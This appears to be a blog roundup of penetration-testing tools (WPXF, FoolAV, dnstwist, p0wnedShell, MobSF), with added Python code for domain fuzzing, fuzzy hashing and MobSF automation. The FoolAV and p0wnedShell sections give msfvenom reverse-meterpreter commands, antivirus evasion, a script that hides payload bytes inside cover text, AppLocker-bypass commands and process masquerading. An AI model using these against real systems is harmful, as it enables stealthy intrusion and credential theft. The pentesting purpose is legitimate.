WordPress Exploit Framework – A Ruby Tool For WordPress Penetration Testing

To install the latest stable build, run gem install wpxf.

After installation, you can launch the WordPress Exploit Framework console by running wpxf.

If you have issues installing WPXF’s dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:


It’s possible that you don’t have the required development header files installed on your system. Here’s what to do if you find yourself in this situation:

If you are experiencing errors indicating that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is in your Ruby bin folder, or in any other folder that is on your environment’s PATH.

The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL. After downloading the archive, extract the contents of its bin directory into your Ruby bin directory (if prompted, don’t overwrite any existing DLLs).

How To Use WordPress Exploit Framework

Start the WordPress Exploit Framework console by running wpxf.

Once loaded, you’ll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment allows you to set its options with the set command and view information about the module using info.

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.



FoolAV – Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host


FoolAV is a tool for antivirus evasion and running arbitrary payload on target Wintel host.

It is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files, the binary executable and the payload file, into the same directory.

Usage:

1. Prepare your payload (x86), e.g.

  • calc: msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you don’t really need an encoder or bad-character blacklisting; it works anyway)
  • meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=… -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

2. Copy the payload file, named [executable-name-without-exe-extension].mf (here, the calc.exe payload generated by the command above), into the same directory as the executable:

3. Once the executable is run, the payload file is parsed, loaded into a separate thread and executed in memory:

FoolAV Calc Screenshot

Notes:

  • The x86 binary runs on both x86 and x86_64 Windows systems, but you still need to use x86 payloads. An x86 meterpreter session can nevertheless be migrated into an x86_64 process; after that, load kiwi loads the x86_64 version, making it possible to access the juicy contents of LSASS process memory 🙂
FoolAV Meterpreter Screenshot
  • The .mf payload file can be obfuscated: the parser ignores every character other than \xHH hexadecimal sequences. This means you can append your payload to almost any file, hide it between lines or even add your own comments, for example:
FoolAV.mf Screenshot
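The parser rule described in the note above (keep \xHH sequences, ignore everything else) is what makes the cover-text trick work. The following is an added example, not FoolAV’s own code: it implements that rule in Python, embeds a constructed stand-in payload between arbitrary cover lines, and shows that the raw msfvenom -f c output parses just as well as the cleaned-up one-liner, so the egrep/tr step in the usage section is a convenience rather than a requirement. The sample bytes and cover lines are constructed, not real shellcode.

```python
"""Parse and produce FoolAV-style .mf payload files.

Added example, not FoolAV's own parser. FoolAV's README states only that the
parser keeps \\xHH sequences and ignores every other character; the regex
below implements that rule (hex digits in either case). Everything else here
is an assumption for illustration.
"""
import re

# One byte per C-style escape: backslash, 'x', two hex digits. Nothing else
# contributes to the payload, which is why comments and cover text are free.
_ESCAPE = re.compile(rb"\\x([0-9A-Fa-f]{2})")


def parse_mf(blob: bytes) -> bytes:
    """Recover the raw payload bytes from the contents of an .mf file."""
    return bytes(int(h, 16) for h in _ESCAPE.findall(blob))


def to_escapes(payload: bytes) -> str:
    """Render bytes as the \\xHH form msfvenom -f c emits."""
    return "".join(f"\\x{b:02x}" for b in payload)


def embed_mf(payload: bytes, cover_lines, per_line: int = 16) -> bytes:
    """Interleave \\xHH-encoded payload chunks with arbitrary cover text.

    The result parses back to `payload` regardless of what the cover text
    says, as long as the cover text itself contains no \\xHH sequence.
    """
    chunks = [to_escapes(payload[i:i + per_line]) for i in range(0, len(payload), per_line)]
    lines = []
    for i, chunk in enumerate(chunks):
        lines.append(cover_lines[i % len(cover_lines)])  # a line of cover text ...
        lines.append(chunk)                               # ... then a slice of payload
    return ("\n".join(lines) + "\n").encode()


# Constructed sample standing in for real shellcode (not a working payload).
SAMPLE_PAYLOAD = bytes(range(0, 40))

# What `msfvenom -f c` prints before the egrep/tr clean-up shown above
# (constructed; the bytes are arbitrary).
MSFVENOM_C_OUTPUT = (
    b"unsigned char buf[] = \n"
    b'"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89"\n'
    b'"\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30";\n'
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        blob = open(sys.argv[1], "rb").read()
    else:
        blob = embed_mf(SAMPLE_PAYLOAD, ["# build notes, nothing to see here", "TODO: clean up"])
    code = parse_mf(blob)
    print(f"{len(code)} payload bytes recovered, starting {code[:8].hex()}")
```

Run it with an .mf file as the argument to see how many bytes the loader would execute; anything that is not a \xHH escape, including the C declaration and the quotes, is simply skipped.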



dnstwist – Domain Name Permutation Engine for Detecting Typo Squatting, Phishing and Corporate Espionage

This installs dnstwist.py as dnstwist, along with all of the requirements mentioned above. Usage is the same; you can simply omit the file extension, and the binary is added to your PATH.

How To Use dnstwist

To start, it’s a good idea to enter only the domain name as an argument. The tool will run it through its fuzzing algorithms and generate a list of potential phishing domains with the following DNS records: A, AAAA, NS and MX.

$ dnstwist.py example.com
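To make the “fuzzing algorithms” concrete, here is an added example, not dnstwist’s own code, of the kind of permutation engine the tool runs before it resolves anything: omission, repetition, transposition, keyboard-adjacency replacement and insertion, addition, hyphenation, subdomain splitting, vowel swapping, bit-squatting and ASCII homoglyphs. It assumes the fuzzed label is everything before the first dot (dnstwist itself uses a public-suffix list) and restricts homoglyphs to ASCII so every output is a valid hostname; dnstwist additionally emits Unicode confusables. DNS resolution is deliberately left out so the block runs offline.

```python
"""Domain-name permutation engine in the spirit of dnstwist's fuzzers.

Added example; not dnstwist's own code. Assumes the fuzzed label is the part
before the first dot, so 'example.co.uk' is fuzzed as 'example' + 'co.uk'.
"""
import itertools

ALLOWED = set("abcdefghijklmnopqrstuvwxyz0123456789-")   # LDH hostname characters

# Physically adjacent keys on a QWERTY layout (letters only), for typo fuzzers.
QWERTY = {
    "q": "wa", "w": "qase", "e": "wsdr", "r": "edft", "t": "rfgy", "y": "tghu",
    "u": "yhji", "i": "ujko", "o": "iklp", "p": "ol",
    "a": "qwsz", "s": "awedxz", "d": "serfcx", "f": "drtgvc", "g": "ftyhbv",
    "h": "gyujnb", "j": "huikmn", "k": "jiolm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
# ASCII look-alikes only; dnstwist also generates Unicode (IDN) confusables.
HOMOGLYPHS = {
    "a": ["4"], "b": ["d"], "d": ["b"], "e": ["3"], "g": ["q", "9"],
    "i": ["1", "l"], "l": ["1", "i"], "m": ["rn"], "o": ["0"], "s": ["5"], "w": ["vv"],
}
VOWELS = "aeiou"


def omission(n):      return {n[:i] + n[i + 1:] for i in range(len(n))}
def repetition(n):    return {n[:i] + c + n[i:] for i, c in enumerate(n)}
def transposition(n): return {n[:i] + n[i + 1] + n[i] + n[i + 2:] for i in range(len(n) - 1)}
def replacement(n):   return {n[:i] + k + n[i + 1:] for i, c in enumerate(n) for k in QWERTY.get(c, "")}
def addition(n):      return {n + c for c in sorted(ALLOWED - {"-"})}
def hyphenation(n):   return {n[:i] + "-" + n[i:] for i in range(1, len(n))}
def subdomain(n):     return {n[:i] + "." + n[i:] for i in range(1, len(n)) if "-" not in (n[i - 1], n[i])}
def vowel_swap(n):    return {n[:i] + v + n[i + 1:] for i, c in enumerate(n) if c in VOWELS for v in VOWELS if v != c}
def homoglyph(n):     return {n[:i] + g + n[i + 1:] for i, c in enumerate(n) for g in HOMOGLYPHS.get(c, [])}


def insertion(n):
    out = set()
    for i, c in enumerate(n):
        for k in QWERTY.get(c, ""):
            out.add(n[:i] + k + n[i:])          # stray neighbouring key hit before the character
            out.add(n[:i + 1] + k + n[i + 1:])  # ... or after it
    return out


def bitsquatting(n):
    """A single flipped bit (memory error, bad link) turns e.g. 'e' into 'd', 'g', 'a', 'm' or 'u'."""
    out = set()
    for i, c in enumerate(n):
        for bit in range(8):
            m = chr(ord(c) ^ (1 << bit))
            if m in ALLOWED:
                out.add(n[:i] + m + n[i + 1:])
    return out


FUZZERS = [omission, repetition, transposition, replacement, insertion, addition,
           hyphenation, subdomain, vowel_swap, bitsquatting, homoglyph]


def permutations(domain):
    """Return {fuzzer name: sorted candidate domains} for one domain."""
    domain = domain.lower().strip(".")
    label, _, suffix = domain.partition(".")
    result = {}
    for fuzz in FUZZERS:
        cands = {f"{v}.{suffix}" if suffix else v for v in fuzz(label)}
        cands.discard(domain)
        # keep only syntactically valid hostnames: non-empty labels, no edge hyphens
        cands = {d for d in cands if all(lbl and lbl[0] != "-" and lbl[-1] != "-" for lbl in d.split("."))}
        result[fuzz.__name__] = sorted(cands)
    return result


def flatten(perms):
    """All candidates across fuzzers, deduplicated."""
    return sorted(set(itertools.chain.from_iterable(perms.values())))


if __name__ == "__main__":
    import sys
    perms = permutations(sys.argv[1] if len(sys.argv) > 1 else "example.com")
    for name, cands in perms.items():
        print(f"{name:14s} {len(cands):4d}  e.g. {', '.join(cands[:3])}")
    print(len(flatten(perms)), "candidates in total")
```

Even for a seven-letter label this yields well over a hundred candidates, which is why the --registered filter described next exists: the interesting subset is the one that actually resolves.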

Usually the generated list of domains has more than a hundred rows, especially for longer domain names. In such cases it may be practical to display only registered (resolvable) ones using the --registered argument.

$ dnstwist.py --registered example.com

Manually checking each domain name for a phishing site might be time-consuming. To address this, dnstwist makes use of so-called fuzzy hashes (context triggered piecewise hashes). Fuzzy hashing is a concept which involves the ability to compare two inputs (in this case HTML code) and determine a fundamental level of similarity. This unique feature of dnstwist can be enabled with the --ssdeep argument. For each generated domain, dnstwist will fetch content from the responding HTTP server (following possible redirects) and compare its fuzzy hash with the one for the original (initial) domain. The level of similarity will be expressed as a percentage. Please keep in mind it’s rather unlikely to get a 100% match for a dynamically generated web page, but each notification should be inspected carefully regardless of the percentage level.

$ dnstwist.py --ssdeep example.com
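Context triggered piecewise hashing is what lets two HTML documents be compared without a byte-exact match. The following is an added example, not dnstwist’s or ssdeep’s code, and is not ssdeep-compatible: it uses a fixed block size instead of ssdeep’s adaptive one and scores similarity as an edit distance over the two signatures. It is enough to show the property that matters: an edit only disturbs the pieces around it, because piece boundaries are decided by a rolling hash over the last few bytes and therefore line up again after the change. The three HTML pages are constructed samples; exarnple.com is merely the homoglyph twin of example.com used as a stand-in phishing host.

```python
"""Simplified context-triggered piecewise hashing (the idea behind ssdeep).

Added example, not dnstwist's or ssdeep's code. Fixed block size, FNV-1a piece
hashes, Levenshtein similarity over the signatures. The HTML inputs below are
constructed for the demonstration.
"""

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7        # bytes of context the rolling hash looks at
BLOCK = 8         # a piece ends where rolling % BLOCK == BLOCK - 1, i.e. roughly every 8 bytes
FNV_OFFSET, FNV_PRIME = 0x811C9DC5, 0x01000193


def ctph(data: bytes, block: int = BLOCK) -> str:
    """One signature symbol per piece. Boundaries depend only on the last WINDOW
    bytes, so after an edit the split points resynchronise instead of every
    later piece shifting."""
    sig, window, rolling, piece = [], [], 0, FNV_OFFSET
    for b in data:
        window.append(b)
        rolling += b
        if len(window) > WINDOW:
            rolling -= window.pop(0)                        # rolling sum of the current window
        piece = ((piece ^ b) * FNV_PRIME) & 0xFFFFFFFF      # FNV-1a over the current piece
        if rolling % block == block - 1:                    # context-triggered boundary
            sig.append(ALPHABET[piece & 63])
            piece = FNV_OFFSET
    sig.append(ALPHABET[piece & 63])                        # trailing partial piece
    return "".join(sig)


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(a: bytes, b: bytes) -> int:
    """0..100: how alike the two documents' piecewise signatures are."""
    sa, sb = ctph(a), ctph(b)
    return 100 - (100 * levenshtein(sa, sb)) // max(len(sa), len(sb))


# Constructed login page standing in for the original domain's content.
ORIGINAL = b"""<html><head><title>Example Corp - Sign in</title>
<link rel="stylesheet" href="/static/app.css"></head>
<body><div class="login"><img src="/static/logo.png" alt="Example Corp">
<form method="post" action="https://login.example.com/session">
<label>Username <input name="user" type="text"></label>
<label>Password <input name="pass" type="password"></label>
<button type="submit">Sign in</button></form>
<p>Forgot your password? <a href="/reset">Reset it</a></p>
</div><script src="/static/app.js"></script></body></html>
"""
# A phishing clone keeps the markup and only repoints the form at the attacker.
CLONE = ORIGINAL.replace(b"https://login.example.com/session", b"https://login.exarnple.com/steal")
# An unrelated page (parked domain) that happens to sit on another permutation.
UNRELATED = b"""<html><head><title>Domain parked</title></head>
<body><h1>This domain is for sale</h1><p>Contact the registrar for pricing.</p>
<ul><li>Premium name</li><li>Fast transfer</li><li>Escrow available</li></ul>
<p>Nothing to see here, move along.</p></body></html>
"""

if __name__ == "__main__":
    for name, page in (("identical", ORIGINAL), ("phishing clone", CLONE), ("unrelated", UNRELATED)):
        print(f"{name:15s} {similarity(ORIGINAL, page):3d}%  {ctph(page)}")
```

The clone scores high because only the handful of pieces covering the rewritten form action differ; the parked page scores low because almost none of its pieces coincide. That is the ordering dnstwist’s percentage column is meant to surface, and why a moderate score on a dynamic page still deserves a manual look.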

In some cases, phishing sites are served from a specific URL. If you provide a full or partial URL as an argument, dnstwist will parse it and apply the same path to each generated domain name variant. This is obviously useful only in conjunction with the fuzzy hashing feature.

$ dnstwist.py --ssdeep https://example.com/owa/
$ dnstwist.py --ssdeep example.com/crm/login

Very often attackers set up e-mail honeypots on phishing domains and wait for mistyped e-mails to arrive. In this scenario, attackers configure their server to vacuum up all e-mail addressed to that domain, regardless of the user it was sent to. Another dnstwist feature allows you to perform a simple test on each mail server (advertised through the DNS MX record) to check which ones can be used for such hostile intent. Suspicious servers will be marked with the SPYING-MX string.

Please be aware of possible false positives. Some mail servers only pretend to accept incorrectly addressed e-mails but then discard those messages. This technique is used to prevent a directory harvest attack.

$ dnstwist.py --mxcheck example.com

The domain names generated by the fuzzing algorithms are not always sufficient. To generate even more variants, feed dnstwist a dictionary file. Some sample dictionaries with the most common words used in targeted phishing campaigns are included; feel free to adapt them to your needs.

$ dnstwist.py --dictionary dictionaries/english.dict example.com

Apart from the default nice and colorful terminal output, the tool provides two well-known, easy-to-parse output formats, CSV and JSON, for data interchange.

$ dnstwist.py --csv example.com > out.csv
$ dnstwist.py --json example.com > out.json

The tool ships with a built-in GeoIP database. Use the --geoip argument to display the geographical location (country name) for each IPv4 address.

$ dnstwist.py --geoip example.com

Of course, all of the features offered by dnstwist together with brief descriptions are always available at your fingertips:

$ dnstwist.py --help



p0wnedShell – PowerShell Runspace Post Exploitation Toolkit


p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It includes many offensive PowerShell modules and binaries to make post-exploitation easier.

The goal was to build an “all in one” post-exploitation tool that bypasses all mitigation solutions (or at least some of them) and has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.

How To Compile It:

To compile p0wnedShell you need to open this project within Microsoft Visual Studio and build it for the x64/x86 platform. You can change the following AutoMasq options before compiling:

public static bool AutoMasq = true;
public static string masqBinary = @"C:\Windows\Notepad.exe";

How To Use It:

With AutoMasq set to false, you just run the executable so it runs normally. With AutoMasq enabled, you could rename the p0wnedShell executable as the process you’re going to masquerade (masqBinary), so it has the appearance of that process (for example notepad.exe).

Using the optional -parent command-line argument, you can start p0wnedShell under another parent process ID. Combining PEB masquerading with a different parent process (for example svchost) gives p0wnedShell the appearance of a legitimate service 😉

Note: Running p0wnedShell under another parent process ID doesn’t work from a Meterpreter session/shell… yet!

Changing the parent process ID can also be used to spawn a p0wnedShell process with SYSTEM privileges, for example using lsass as the parent process. For this you need UAC-elevated administrator permissions.

C:\p0wnedShell>p0wnedShellx64.exe -parent

 [+] Please enter a valid Parent Process name.
 [+] For Example: C:\p0wnedShell\p0wnedShellx64.exe -parent svchost

C:\p0wnedShell>p0wnedShellx64.exe -parent lsass

To run as an x86 binary and bypass AppLocker (credit for this great bypass goes to Casey Smith aka subTee):

cd \Windows\Microsoft.NET\Framework\v4.0.30319 (or a newer .NET version folder)

InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx86.exe

To run as an x64 binary and bypass AppLocker:

cd \Windows\Microsoft.NET\Framework64\v4.0.30319 (or a newer .NET version folder)

InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx64.exe

What’s inside the runspace:

The following PowerShell tools/functions are included:

  • PowerSploit: Invoke-Shellcode
  • PowerSploit: Invoke-ReflectivePEInjection
  • PowerSploit: Invoke-Mimikatz
  • PowerSploit: Invoke-TokenManipulation
  • PowerSploit: PowerUp and PowerView
  • Rasta Mouse: Sherlock
  • HarmJ0y’s: Invoke-Psexec and Invoke-Kerberoast
  • Rohan Vazarkar’s: Invoke-BloodHound (C# Ingestor)
  • Chris Campbell’s: Get-GPPPassword
  • Tim Medin’s: GetUserSPNS
  • Besimorhino’s: PowerCat
  • Nishang: Copy-VSS and Invoke-Encode
  • Nishang: Invoke-PortScan and Get-PassHashes
  • Kevin Robertson: Invoke-Tater, Invoke-SMBExec and Invoke-WMIExec
  • Kevin Robertson: Invoke-Inveigh and Invoke-InveighRelay
  • FuzzySecurity: Invoke-MS16-032 and Invoke-MS16-135

PowerShell functions within the runspace are loaded into memory from Base64-encoded, compressed strings.

Binaries are loaded into memory using ReflectivePEInjection (byte arrays are Gzip-compressed and stored within p0wnedShell as Base64-encoded strings).



Unicorn-Bios – Basic BIOS Emulator for Unicorn Engine



Mobile Security Framework (MobSF) – An All-In-One Mobile Application Security Assessment Framework


Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

MobSF supports mobile app binaries (APK, IPA & APPX) along with zipped source code, and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline. The Dynamic Analyzer helps you perform runtime security assessment and interactive instrumented testing.

Screenshots:

  • Static Analysis – Android
MobSF Android Static Analysis Screenshot

Requirements:

  • Mac:
    • Install Git
    • Install Python 3.6 – 3.7 (3.8 is not supported)
    • macOS Catalina users must uninstall existing python3 and install the one from Python.org. After installation, go to /Applications/Python 3.7/ and run Install Certificates.command and Update Shell Profile.command
    • Install JDK 8+
    • Install command line tools: xcode-select --install
    • Download & Install wkhtmltopdf as per the wiki instructions
    • macOS Mojave users, install headers if available: 

  • Ubuntu/Debian based Linux:
    • Install Git: sudo apt-get install git
    • Install Python 3.6-3.7: sudo apt-get install python3
    • Install JDK 8+: sudo apt-get install openjdk-8-jdk
    • Install the following dependencies 

If you are running MobSF on a Windows host, you do not have to configure anything apart from interacting with the automated installation script the first time you run MobSF. However, if you are using a different host OS, you need to configure a Windows VM. Sadly binskim is only available on Windows, so even for static analysis a Windows VM is required.
Steps on the Windows-VM:

  • Install the following requirements on the VM
    • Python 3
    • rsa (via python -m pip install rsa)
  • Download the setup.py script and run it
  • There is some manual interaction, but if there are no errors, everything is good and the RPC-Server should be running.

Remember: Use separate Windows-VM for MobSF and don’t expose it to a network range where an attack might be coming from. The best solution is to set it to host-only mode.

  • To integrate a Windows-VM into MobSF, please follow these steps. 
    • Get the IP of your VM and set it in MobSF/settings.py (search for WINDOWS_VM_IP)
    • (If not yet done:) Copy the private rsa key from the vm to MobSF

If you see errors like this:

The MobSF setup script assumes that your VM or host Windows box has a C: drive and that you have permission to read and write in C:\MobSF. This error occurs if you don’t have proper read/write permissions.

IMPORTANT:

  • Set JAVA_HOME environment variable.
  • iOS IPA Analysis works only on Mac, Linux and Docker containers.

Dynamic Analysis:

  • Dynamic Analysis will not work if you use MobSF docker container or setup MobSF inside a Virtual Machine.
  • Install Genymotion

Installation:

Tested on Windows 10, Ubuntu (18.04, 19.04) , macOS Catalina

IMPORTANT: Windows users, before running setup.bat close any opened folders of MobSF or text editors with MobSF opened. Either of these can interrupt the setup by causing permission errors.

Running MobSF

  • For Linux and Mac: ./run.sh
  • For Windows: run.bat

You can navigate to http://localhost:8000/ to access MobSF web interface.

Configuring Dynamic Analyzer

Dynamic analysis using a real mobile phone is not supported.

Run a Genymotion Android VM before starting MobSF. Everything will be configured automatically at runtime. MobSF requires Genymotion Android x86 VMs version 4.1 to 9.0 for dynamic analysis. We recommend using Android 7.0 and above.

Android versions 5 and above are automatically MobSFyed on first run. For Android versions less than 5, you must MobSFy the Android Runtime prior to Dynamic Analysis for the first time. Click MobSFy Android Runtime button in Dynamic Analysis page to MobSFy the android runtime environment.


HTTPS Proxy

  • For Android versions 4.4 – 9.0, global proxy settings are automatically applied at runtime.
  • For Android version 4.1 – 4.3, set Android VM proxy as displayed in Dynamic Analysis page.

If the Dynamic Analyzer doesn’t detect your Android device, you need to manually configure ANALYZER_IDENTIFIER in MobSF/settings.py, for example ANALYZER_IDENTIFIER = '192.168.56.101:5555'. You can find the Android device IP in the Genymotion title bar; the default port is 5555.

MobSF Docker Container

Too lazy to set up MobSF? Use the latest MobSF Docker image (Dynamic Analysis is not supported).

MobSF e-Learning Courses & Certification

We have 2 self-paced e-learning courses that cover MobSF and other Android security tools.

  • OpSecX – Automated Mobile Application Security Assessment with MobSF – MAS (Currently being updated)
  • OpSecX – Android Security Tools Expert – ATX

Updating MobSF

If you are updating MobSF, in most cases you will have to perform database migrations or you will see errors such as

Run the command below to migrate your DB

If the above doesn’t work, you might have to run setup.sh or setup.bat again, which will delete your previous scan results.

APKiD

APKiD is enabled by default. To disable it, set APKID_ENABLED to False in MobSF/settings.py.

VirusTotal Scan

VirusTotal Scan is disabled by default. You need to add your VirusTotal API Key before enabling it.

AppMonsta Android Play Store Information

We use the AppMonsta API to fetch details from the Google Play Store as a fail-safe for our primary implementation. It is disabled by default; to enable it you need an AppMonsta API key.

  • Get AppMonsta API Key from: AppMonsta API Key
  • In MobSF/settings.py, add your API Key to APPMONSTA_KEY and restart MobSF.

Mass Static Analysis

MobSF supports mass static analysis. Here is how to run a mass static analysis:

  • Run mass_static_analysis.py

Example: python mass_static_analysis.py -s 127.0.0.1:8000 -d /home/files/ 
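The mass static analysis script above and the REST API mentioned earlier serve the same purpose: driving MobSF without the browser. The following is an added example, not MobSF’s own mass_static_analysis.py, of how a CI job can use that API end to end: upload every APK/IPA/APPX/zip in a directory, trigger the static scan, pull the JSON report and fail the build once the report carries more high-severity findings than a threshold allows. The endpoints (/api/v1/upload, /api/v1/scan, /api/v1/report_json) and the Authorization header carrying the API key are MobSF’s documented REST API; the server URL, the environment variable holding the key and the threshold are assumptions. The JSON report layout has changed between MobSF releases, so the finding counter walks the report for any object with a "severity" key rather than assuming one schema, and the embedded report fragment is a constructed sample, not real scanner output.

```python
"""Drive MobSF from a CI job through its REST API: upload every mobile app
binary in a directory, run the static scan, fetch the JSON report and fail
the build when it carries more high-severity findings than allowed.

Added example, not MobSF's own mass_static_analysis.py. Endpoints and the
Authorization header are MobSF's documented REST API; MOBSF_URL,
MOBSF_API_KEY and the threshold are assumptions for this example.
"""
import json
import os
import sys
import urllib.parse
import urllib.request
import uuid

MOBSF = os.environ.get("MOBSF_URL", "http://127.0.0.1:8000")   # assumed location of the MobSF server
API_KEY = os.environ.get("MOBSF_API_KEY", "")                   # MobSF prints its REST API key at startup
SCAN_TYPES = {".apk": "apk", ".ipa": "ipa", ".appx": "appx", ".zip": "zip"}


def _post(path, fields=None, body=None, content_type=None):
    """POST to MobSF with the API key; either form fields or a prepared body."""
    if body is None:
        body = urllib.parse.urlencode(fields).encode()
        content_type = "application/x-www-form-urlencoded"
    req = urllib.request.Request(MOBSF + path, data=body, method="POST")
    req.add_header("Authorization", API_KEY)
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req, timeout=900) as resp:   # static scans can take minutes
        return json.load(resp)


def multipart(field, filename, payload, boundary=None):
    """Encode one file as multipart/form-data (the stdlib has no helper for this)."""
    boundary = boundary or uuid.uuid4().hex
    head = (f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; '
            f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n')
    body = head.encode() + payload + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def upload(path):
    with open(path, "rb") as fh:
        body, ctype = multipart("file", os.path.basename(path), fh.read())
    return _post("/api/v1/upload", body=body, content_type=ctype)  # {"hash", "scan_type", "file_name", ...}


def scan(meta):
    return _post("/api/v1/scan", {"scan_type": meta["scan_type"],
                                  "file_name": meta["file_name"], "hash": meta["hash"]})


def report(meta):
    return _post("/api/v1/report_json", {"hash": meta["hash"]})


def count_findings(node, counts=None):
    """Walk the report and tally every "severity" value it contains, whatever the nesting."""
    counts = {} if counts is None else counts
    if isinstance(node, dict):
        if isinstance(node.get("severity"), str):
            counts[node["severity"]] = counts.get(node["severity"], 0) + 1
        for value in node.values():
            count_findings(value, counts)
    elif isinstance(node, list):
        for value in node:
            count_findings(value, counts)
    return counts


def gate(counts, max_high=0):
    """True when the build may proceed."""
    return counts.get("high", 0) <= max_high


# Constructed fragment in the shape of a MobSF JSON report, for offline use; not real scanner output.
SAMPLE_REPORT = {
    "file_name": "demo.apk",
    "manifest_analysis": [
        {"title": "Debug enabled for app", "severity": "high", "description": "android:debuggable=true"},
        {"title": "Activity is exported", "severity": "warning", "description": "exported=true"},
    ],
    "code_analysis": {"findings": {
        "android_insecure_random": {"metadata": {"severity": "warning"}, "files": {"a/Rng.java": "12"}},
        "android_hardcoded_secret": {"metadata": {"severity": "high"}, "files": {"a/Cfg.java": "3"}},
    }},
    "network_security": [{"scope": "*", "severity": "info", "description": "cleartext allowed"}],
}

if __name__ == "__main__":
    directory = sys.argv[1]
    max_high = int(sys.argv[2]) if len(sys.argv) > 2 else 0
    failed = False
    for name in sorted(os.listdir(directory)):
        if os.path.splitext(name)[1].lower() not in SCAN_TYPES:
            continue
        meta = upload(os.path.join(directory, name))
        scan(meta)
        counts = count_findings(report(meta))
        ok = gate(counts, max_high)
        failed = failed or not ok
        print(f"{name}: {counts} -> {'OK' if ok else 'FAIL'}")
    sys.exit(1 if failed else 0)
```

Run it as python mobsf_gate.py /home/files/ 0 with MOBSF_URL and MOBSF_API_KEY exported; the non-zero exit status is what makes the pipeline stage fail. Keep the API key out of the repository and treat the MobSF host like any other service that executes untrusted input, which is the same advice the Windows-VM note above gives.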

Using Postgres DB instead of SQLite:

Install psycopg2: pip3 install psycopg2-binary

Go to MobSF/settings.py

Comment the following:

Now uncomment the following:

Create a database in Postgres named mobsf and configure the above settings with correct username, password and other details.

Apply Migrations:

Now you can start MobSF server and you have successfully configured Postgres as your database.

If you want all user uploads, downloads and user configurations to be created in home directory, enable home directory support:

To provide a personalized version of MobSF to multiple users on one OS, or to bundle MobSF with a pentesting distro, you might need home directory support enabled.

To enable Home Directory support, go to settings.py and set USE_HOME to True.

